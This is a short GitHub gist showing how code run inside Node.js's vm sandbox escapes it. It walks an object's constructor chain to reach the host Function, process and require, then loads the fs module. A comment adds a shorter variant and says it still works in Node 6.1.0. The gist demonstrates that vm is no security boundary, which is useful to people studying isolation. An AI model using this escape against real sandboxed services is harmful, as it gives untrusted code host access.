Created
August 17, 2015 20:20
-
-
Save domenic/d15dfd8f06ae5d1109b0 to your computer and use it in GitHub Desktop.
Escaping the vm sandbox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"use strict"; | |
const vm = require("vm"); | |
const sandbox = { anObject: {} }; | |
const whatIsThis = vm.runInNewContext(` | |
const ForeignObject = anObject.constructor; | |
const ForeignFunction = ForeignObject.constructor; | |
const process = ForeignFunction("return process")(); | |
const require = process.mainModule.require; | |
require("fs"); | |
`, sandbox); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.
Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.